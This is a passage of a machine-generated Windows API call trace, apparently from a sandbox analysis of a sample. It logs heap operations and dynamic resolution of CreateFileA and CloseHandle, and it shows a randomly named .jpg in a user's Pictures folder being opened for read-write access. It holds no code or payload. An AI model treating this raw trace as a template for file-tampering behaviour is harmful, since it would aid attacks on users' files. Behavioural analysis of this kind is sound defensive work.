hHeap=0x770000) returned 1 [0041.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.217] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x889910 [0041.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x889910, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0041.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.217] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0041.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0041.217] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.218] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5a8 [0041.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0041.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0041.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0041.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xab2010 [0041.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg", cchWideChar=54, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0041.218] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x36) returned 0x7c2080 [0041.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg", cchWideChar=54, lpMultiByteStr=0x7c2080, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg", lpUsedDefaultChar=0x0) returned 54 [0041.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0041.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0041.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0041.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0041.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0041.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0041.219] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\oaci\\zsk4r.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0041.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0041.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0041.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0041.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0041.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0041.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0041.219] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0041.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0041.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cf10 [0041.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.219] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0041.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=54, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 54 [0041.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6c) returned 0x7db300 [0041.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xab2010, cbMultiByte=54, lpWideCharStr=0x7db300, cchWideChar=54 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\zSK4r.jpg") returned 54 [0041.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0041.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0041.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0041.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xab2010 | out: hHeap=0x770000) returned 1 [0041.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0041.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0041.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c880 [0041.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0041.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0041.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.220] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0041.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0041.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.220] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0041.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0041.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0041.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0041.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0041.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889508 [0041.221] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af408 [0041.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0041.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af408 | out: hHeap=0x770000) returned 1 [0041.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0041.221] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0041.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0041.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0041.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0041.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.221] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897c0 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce08 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0041.222] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0041.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0041.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0041.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0041.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b12b0 [0041.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0041.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af568 [0041.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0041.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0041.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.223] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0041.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0041.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0041.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0041.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0041.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2080 [0041.223] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0041.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1328 [0041.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0041.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0041.223] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0041.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.223] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0041.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0041.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0041.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0041.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0041.224] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.224] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.224] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0041.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.225] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0041.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0041.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c808 [0041.225] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c808, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0041.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c808 | out: hHeap=0x770000) returned 1 [0041.225] GetProcAddress (hModule=0x76e10000, lpProcName="CloseHandle") returned 0x76e21410 [0041.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0041.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13c8 [0041.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0041.225] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0041.225] CloseHandle (hObject=0x140) returned 1 [0041.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0041.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0041.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0041.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0041.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0041.225] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce08 [0041.226] FreeLibrary (hLibModule=0x76e10000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ac0 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0041.226] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 